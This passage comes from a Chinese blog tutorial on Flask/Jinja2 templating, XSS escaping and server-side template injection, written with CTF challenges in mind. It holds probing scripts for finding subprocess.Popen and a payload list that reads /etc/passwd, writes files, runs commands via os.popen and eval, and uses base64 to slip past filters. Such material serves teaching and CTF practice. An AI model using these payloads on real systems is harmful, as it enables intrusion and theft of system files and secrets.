class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;X-UA-Compatible&quot;</span> <span class="attr">content</span>=<span class="string">&quot;IE=edge&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;viewport&quot;</span> <span class="attr">content</span>=<span class="string">&quot;width=device-width, initial-scale=1.0&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Flask<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    &#123;% if name %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">h2</span>&gt;</span>Hello, &#123;&#123; name &#125;&#125;<span class="tag">&lt;/<span class="name">h2</span>&gt;</span></span><br><span class="line">    &#123;% else %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">h2</span>&gt;</span>Fuck! Tell me your name!<span class="tag">&lt;/<span class="name">h2</span>&gt;</span></span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="第二种：循环控制"><a href="#第二种：循环控制" class="headerlink" title="第二种：循环控制"></a>第二种：循环控制</h5><p>使用格式如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> item <span class="keyword">in</span> <span class="built_in">list</span> %&#125;</span><br><span class="line"><span class="built_in">list</span> 不空时执行</span><br><span class="line">&#123;% <span class="keyword">else</span> %&#125;</span><br><span class="line"><span class="built_in">list</span> 为空时执行的默认语句块</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>举一个实例：</p>
<p><code>app.py</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template</span><br><span class="line"> </span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Hello_world</span>():</span><br><span class="line">    list_in = [<span class="string">&#x27;Job&#x27;</span>, <span class="string">&#x27;Nike&#x27;</span>, <span class="string">&#x27;???&#x27;</span>]</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>, list_in=list_in)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">False</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p><code>./templates/index.html</code></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;X-UA-Compatible&quot;</span> <span class="attr">content</span>=<span class="string">&quot;IE=edge&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;viewport&quot;</span> <span class="attr">content</span>=<span class="string">&quot;width=device-width, initial-scale=1.0&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Flask<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    &#123;% for item in list_in %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">p</span>&gt;</span>Hello, &#123;&#123; item &#125;&#125;<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">    &#123;% else %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">p</span>&gt;</span>&#123;&#123; &quot;You can&#x27;t get here&quot; &#125;&#125;<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">    &#123;% endfor %&#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="第三种：过滤器"><a href="#第三种：过滤器" class="headerlink" title="第三种：过滤器"></a>第三种：过滤器</h5><p>过滤器可以对变量加以滤器修改。过滤器通过管道符号<code>|</code>与变量分隔，并且在括号中可以包含可选参数。一个变量可以链接多个过滤器。一个过滤器的输出可以应用于下一个过滤器。</p>
<p>例如，把<code>hello</code>转大写字母</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; &#x27;hello&#x27;|upper &#125;&#125;</span><br></pre></td></tr></table></figure>

<p>常用过滤器：</p>
<table>
<thead>
<tr>
<th>过滤器</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>safe</td>
<td>禁止转义，渲染时不会转义特殊字符</td>
</tr>
<tr>
<td>capitallize</td>
<td>把首字母转大写，其他的字母转小写</td>
</tr>
<tr>
<td>lower</td>
<td>把所有的字母转小写</td>
</tr>
<tr>
<td>upper</td>
<td>把所有字母转大写</td>
</tr>
<tr>
<td>title</td>
<td>把每个单词的首字母转大写</td>
</tr>
<tr>
<td>trim</td>
<td>去掉首尾空格</td>
</tr>
<tr>
<td>striptags</td>
<td>去掉所有的 HTML 标签</td>
</tr>
<tr>
<td>join</td>
<td>将多个值拼接成字符串，类似 Python 的 join() 函数</td>
</tr>
<tr>
<td>replace</td>
<td>替换字符串的值</td>
</tr>
<tr>
<td>round</td>
<td>对数字四舍五入</td>
</tr>
<tr>
<td>int</td>
<td>转换成int类型</td>
</tr>
</tbody></table>
<p>还存在列表过滤器，可对列表进行索引，排序，求和，求长等操作。还可以自定义过滤器详见：<a target="_blank" rel="noopener" href="https://blog.csdn.net/kylinxjd/article/details/94563427">Jinja2常用模板语言（条件判断if，循环遍历for，过滤器）</a></p>
<h3 id="Flask-中的-XSS-漏洞"><a href="#Flask-中的-XSS-漏洞" class="headerlink" title="Flask 中的 XSS 漏洞"></a>Flask 中的 XSS 漏洞</h3><p>在 Flask 中，使用<code>render_template_string</code>（从字符串渲染）或<code>render_template</code>（从文件渲染）渲染出来的 HTML 并不会出现 xss，例如上文的代码（使用 jinja2 模板）并不会出现 xss，同样下面的代码也不会出现 xss：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template_string</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&lt;a href=&quot;/xss&quot;&gt;Test XSS&lt;/a&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/xss&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">xss</span>():</span><br><span class="line">    template = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    &lt;form action=&quot;/xss&quot; method=&quot;post&quot;&gt;</span></span><br><span class="line"><span class="string">    &lt;input type=&quot;text&quot; name=&quot;input&quot;/&gt;&lt;/br&gt;</span></span><br><span class="line"><span class="string">    &lt;input type=&quot;submit&quot; value=&quot;Submit&quot;/&gt;</span></span><br><span class="line"><span class="string">    &lt;/form&gt;</span></span><br><span class="line"><span class="string">    &lt;/br&gt;</span></span><br><span class="line"><span class="string">    &#123;&#123; _input &#125;&#125;</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;GET&#x27;</span>:</span><br><span class="line">        <span class="keyword">return</span> render_template_string(template)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> render_template_string(template, _<span class="built_in">input</span>=request.form[<span class="string">&quot;input&quot;</span>])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;127.0.0.1&#x27;</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p>这是因为<code>&#123;&#123;&#125;&#125;</code>中的内容被 jinja 中的过滤了的缘故，特殊的字符被转义了，抓包或者查看 HTML 原始数据可以验证这一点：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">&amp;lt;</span>script<span class="symbol">&amp;gt;</span>alert(0)<span class="symbol">&amp;lt;</span>/script<span class="symbol">&amp;gt;</span></span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="left">显示结果</th>
<th align="left">描述</th>
<th align="left">实体名称</th>
<th align="left">实体编号</th>
</tr>
</thead>
<tbody><tr>
<td align="left">&lt;</td>
<td align="left">小于号</td>
<td align="left">&amp;lt;</td>
<td align="left">&amp;#60;</td>
</tr>
<tr>
<td align="left">&gt;</td>
<td align="left">大于号</td>
<td align="left">&amp;gt;</td>
<td align="left">&amp;#62;</td>
</tr>
<tr>
<td align="left">&amp;</td>
<td align="left">和号</td>
<td align="left">&amp;amp;</td>
<td align="left">&amp;#38;</td>
</tr>
<tr>
<td align="left">“</td>
<td align="left">引号</td>
<td align="left">&amp;quot;</td>
<td align="left">&amp;#34;</td>
</tr>
</tbody></table>
<p>详细分析见：<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/ed0622f21df4">XSS防御——从Flask源码看XSS防御</a></p>
<h3 id="Flask-中的-SSTI-漏洞"><a href="#Flask-中的-SSTI-漏洞" class="headerlink" title="Flask 中的 SSTI 漏洞"></a>Flask 中的 SSTI 漏洞</h3><h4 id="造成-SSTI-的原因"><a href="#造成-SSTI-的原因" class="headerlink" title="造成 SSTI 的原因"></a>造成 SSTI 的原因</h4><p>SSTI 服务端模板注入，SSTI 主要为 Python 的一些框架 jinja2、mako、tornado、django，PHP 框架 smarty、twig，Java 框架 jade、velocity 等等使用了渲染函数时，由于代码不规范或信任了用户输入而导致了服务端模板注入，模板渲染其实并没有漏洞，主要是程序员对代码不规范不严谨造成了模板注入漏洞，造成模板可控。</p>
<h4 id="漏洞示例"><a href="#漏洞示例" class="headerlink" title="漏洞示例"></a>漏洞示例</h4><p>将参数当字符串来渲染并使用了传入的参数时，可能会导致模板渲染可控，如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template_string</span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">test</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;test&#x27;</span>)</span><br><span class="line">    template = <span class="string">&#x27;&lt;html&gt;%s&lt;/html&gt;&#x27;</span> % code</span><br><span class="line">    <span class="keyword">return</span> render_template_string(template)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">False</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p>输入测试参数<code>/?test=&#123;&#123;7*7&#125;&#125;</code>，就会发现渲染被控制了，输出为<code>49</code>。如果使用模板来渲染，就不会出现这样的情况。</p>
<p>Flask 中也有一些全局变量，使用<code>?test=&#123;&#123;config&#125;&#125;</code>就可以查看到，常用的配置及其含义：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ENV：测试环境</span><br><span class="line">production：生产环境</span><br><span class="line">development：开发环境</span><br><span class="line">DEBUG：是否开启 debug 模式</span><br><span class="line">SECRET_KEY：密钥字符串</span><br><span class="line">JSON_AS_ASCII：是否以 ascii 编码展示响应报文</span><br><span class="line">JSONIFY_MIMETYPE：响应报文类型</span><br></pre></td></tr></table></figure>

<h4 id="漏洞的利用"><a href="#漏洞的利用" class="headerlink" title="漏洞的利用"></a>漏洞的利用</h4><p>利用的方法：进行文件操作或者进行命令的执行</p>
<p><strong>利用的思路</strong>：找到父类 &lt;type ‘object’&gt; –&gt; 寻找子类 <strong>subclasses()</strong> –&gt; 找关于 <strong>命令执行</strong> 或者 <strong>文件操作</strong> 的模块</p>
<p>构造继承链的思路是：</p>
<ol>
<li>随便找一个内置类对象用 class 拿到他所对应的类</li>
<li>用 bases 拿到基类（&lt;class ‘object’&gt;）</li>
<li>用 subclasses () 拿到子类列表</li>
<li>在子类列表中直接寻找可以利用的类</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">__class__         返回调用的参数类型</span><br><span class="line">__bases__         返回基类列表 </span><br><span class="line">__mro__           此属性是在方法解析期间寻找基类时的参考类元组 </span><br><span class="line">__subclasses__()  返回子类的列表 </span><br><span class="line">__globals__       以字典的形式返回函数所在的全局命名空间所定义的全局变量，与 func_globals 等价 </span><br><span class="line">__builtins__      内建模块的引用，在任何地方都是可见的（包括全局），每个 Python 脚本都会自动加载，这个模块包括了很多强大的  built-<span class="keyword">in</span> 函数，例如 <span class="built_in">eval</span>, <span class="built_in">exec</span>, <span class="built_in">open</span> 等等</span><br></pre></td></tr></table></figure>

<p>一般情况下使用脚本找可利用类的索引，脚本大概是这样（<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[RootersCTF2019]I_%3C3_Flask">针对题目</a>，要随实际情况变化）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> html</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">index = <span class="number">0</span></span><br><span class="line"><span class="comment"># 粗略估计下 subprocess.Popen 的位置，就不从 0 开始了</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">200</span>, <span class="number">1000</span>):</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        url = <span class="string">&quot;http://xxx/&quot;</span></span><br><span class="line">        data = <span class="string">&quot;&#123;&#123;&#x27;&#x27;.__class__.__mro__[1].__subclasses__()[&quot;</span> + <span class="built_in">str</span>(i) + <span class="string">&quot;]&#125;&#125;&quot;</span></span><br><span class="line"></span><br><span class="line">        url = url + <span class="string">&quot;?name=&quot;</span> + data</span><br><span class="line">        </span><br><span class="line">        time.sleep(<span class="number">0.2</span>)</span><br><span class="line">        r = requests.get(url)</span><br><span class="line">        r.encoding = <span class="string">&#x27;utf-8&#x27;</span></span><br><span class="line">        </span><br><span class="line">        res = re.findall(<span class="string">&quot;I &amp;hearts; Flask &amp; (.*)&quot;</span>, r.text)</span><br><span class="line">        res = html.unescape(res[<span class="number">0</span>])</span><br><span class="line">        <span class="built_in">print</span>(<span class="built_in">str</span>(i) + <span class="string">&quot; | &quot;</span> + res)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;subprocess.Popen&quot;</span> <span class="keyword">in</span> res:</span><br><span class="line">            index = i</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;index of subprocess.Popen:&quot;</span> + <span class="built_in">str</span>(index))</span><br></pre></td></tr></table></figure>

<p>还有一种脚本（<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[RootersCTF2019]I_%3C3_Flask">针对题目</a>，它也要随实际情况改写）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://xxx/&quot;</span></span><br><span class="line">data = <span class="string">&quot;&#123;&#123;&#x27;&#x27;.__class__.__mro__[1].__subclasses__()&#125;&#125;&quot;</span></span><br><span class="line"></span><br><span class="line">url = url + <span class="string">&quot;?name=&quot;</span> + data</span><br><span class="line"></span><br><span class="line">r = requests.get(url)</span><br><span class="line">r.encoding=<span class="string">&quot;utf-8&quot;</span></span><br><span class="line">soup = BeautifulSoup(r.text, <span class="string">&quot;lxml&quot;</span>)</span><br><span class="line"></span><br><span class="line">item = soup.find(<span class="string">&#x27;div&#x27;</span>, &#123;<span class="string">&quot;class&quot;</span>: <span class="string">&quot;content-section&quot;</span>&#125;).text</span><br><span class="line">item = re.sub(<span class="string">&#x27;\[|\]&#x27;</span>, <span class="string">&#x27;&#x27;</span>, item)</span><br><span class="line">item = re.sub(<span class="string">&#x27;        I ♥ Flask &amp; &#x27;</span>, <span class="string">&#x27;&#x27;</span>, item)</span><br><span class="line">item = item.split(<span class="string">&#x27;,&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(item.index(<span class="string">&quot; &lt;class &#x27;subprocess.Popen&#x27;&gt;&quot;</span>))</span><br></pre></td></tr></table></figure>

<h4 id="常用-Payload"><a href="#常用-Payload" class="headerlink" title="常用 Payload"></a>常用 Payload</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">python3</span><br><span class="line">文件读取：&#123;&#123; ().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">177</span>].__init__.__globals__.__builtins__[<span class="string">&#x27;open&#x27;</span>](<span class="string">&#x27;file&#x27;</span>).read() &#125;&#125;</span><br><span class="line">命令执行：&#123;&#123; config.__class__.__init__.__globals__[<span class="string">&#x27;os&#x27;</span>].popen(<span class="string">&#x27;ls&#x27;</span>).read() &#125;&#125;</span><br><span class="line">命令执行：&#123;&#123; lipsum.__globals__.__getitem__[<span class="string">&quot;os&quot;</span>].popen(<span class="string">&quot;whoami&quot;</span>).read() &#125;&#125;</span><br><span class="line"></span><br><span class="line">python2</span><br><span class="line">文件读取：&#123;&#123; <span class="string">&#x27;&#x27;</span>.__class__.__mro__[<span class="number">2</span>].__subclasses__()[<span class="number">40</span>](<span class="string">&#x27;/etc/passwd&#x27;</span>).read() &#125;&#125;</span><br><span class="line">文件读取：&#123;&#123; ().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">40</span>](<span class="string">&#x27;/etc/passwd&#x27;</span>).readlines &#125;&#125;</span><br><span class="line">文件读取：&#123;&#123; ().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.__globals__.__builtins__[<span class="string">&#x27;open&#x27;</span>](<span class="string">&#x27;/etc/passwd&#x27;</span>).read() &#125;&#125;</span><br><span class="line">写文件：&#123;&#123; <span class="string">&#x27;&#x27;</span>.__class__.__mro__[<span class="number">2</span>].__subclasses__()[<span class="number">40</span>](<span class="string">&#x27;/tmp/1&#x27;</span>).write(<span class="string">&quot;&quot;</span>) &#125;&#125;</span><br><span class="line">命令执行：&#123;&#123; <span class="string">&#x27;&#x27;</span>.__class__.__mro__[<span class="number">2</span>].__subclasses__()[<span class="number">59</span>].__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;</span>) &#125;&#125;</span><br><span class="line">命令执行：&#123;&#123; <span class="string">&#x27;&#x27;</span>.__class__.__mro__[<span class="number">2</span>].__subclasses__()[<span class="number">40</span>](<span class="string">&#x27;/tmp/owned.cfg&#x27;</span>,<span class="string">&#x27;w&#x27;</span>).write(<span class="string">&#x27;code&#x27;</span>) &#125;&#125;  </span><br><span class="line">&#123;&#123; config.from_pyfile(<span class="string">&#x27;/tmp/owned.cfg&#x27;</span>) &#125;&#125;</span><br><span class="line"></span><br><span class="line">python2、python3 共有，可命令执行：</span><br><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> ().__class__.__bases__[<span class="number">0</span>].__subclasses__(): %&#125;</span><br><span class="line">  &#123;% <span class="keyword">if</span> c.__name__ == <span class="string">&#x27;_IterationGuard&#x27;</span>: %&#125;</span><br><span class="line">    &#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;</span>) &#125;&#125;</span><br><span class="line">  &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">eval</span>(<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;</span>)&#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">  &#123;% <span class="keyword">if</span> c.__name__ == <span class="string">&#x27;catch_warnings&#x27;</span> %&#125;</span><br><span class="line">    &#123;% <span class="keyword">for</span> b <span class="keyword">in</span> c.__init__.__globals__.values() %&#125;</span><br><span class="line">      &#123;% <span class="keyword">if</span> b.__class__ == &#123;&#125;.__class__ %&#125;</span><br><span class="line">        &#123;% <span class="keyword">if</span> <span class="string">&#x27;eval&#x27;</span> <span class="keyword">in</span> b.keys() %&#125; </span><br><span class="line">          &#123;&#123; b[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&#x27;__import__(&quot;os&quot;).popen(&quot;ls&quot;).read()&#x27;</span>) &#125;&#125;</span><br><span class="line">        &#123;% endif %&#125;</span><br><span class="line">      &#123;% endif %&#125;</span><br><span class="line">     &#123;% endfor %&#125;</span><br><span class="line">  &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<h4 id="常用绕过"><a href="#常用绕过" class="headerlink" title="常用绕过"></a>常用绕过</h4><ol>
<li><p>过滤关键词，使用 Base64 绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 对输入有关键词的过滤</span></span><br><span class="line"><span class="comment"># &#123;&#123;().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;ls /&quot;).read()&#x27;)&#125;&#125;</span></span><br><span class="line">&#123;&#123;().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.__globals__[<span class="string">&#x27;X19idWlsdGluc19f&#x27;</span>.decode(<span class="string">&#x27;base64&#x27;</span>)][<span class="string">&#x27;ZXZhbA==&#x27;</span>.decode(<span class="string">&#x27;base64&#x27;</span>)](<span class="string">&#x27;X19pbXBvcnRfXygib3MiKS5wb3BlbigibHMgLyIpLnJlYWQoKQ==&#x27;</span>.decode(<span class="string">&#x27;base64&#x27;</span>))&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 对输出有关键词的过滤</span></span><br><span class="line"><span class="comment"># &#123;&#123;().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;cat /flag&quot;).read()&#x27;)&#125;&#125;</span></span><br><span class="line"></span><br><span class="line">&#123;&#123;().__class__.__bases__[<span class="number">0</span>].__subclasses__()[<span class="number">59</span>].__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&#x27;__import__(&quot;os&quot;).popen(&quot;cat /flag&quot;).read().encode(&quot;base64&quot;)&#x27;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>
</li>
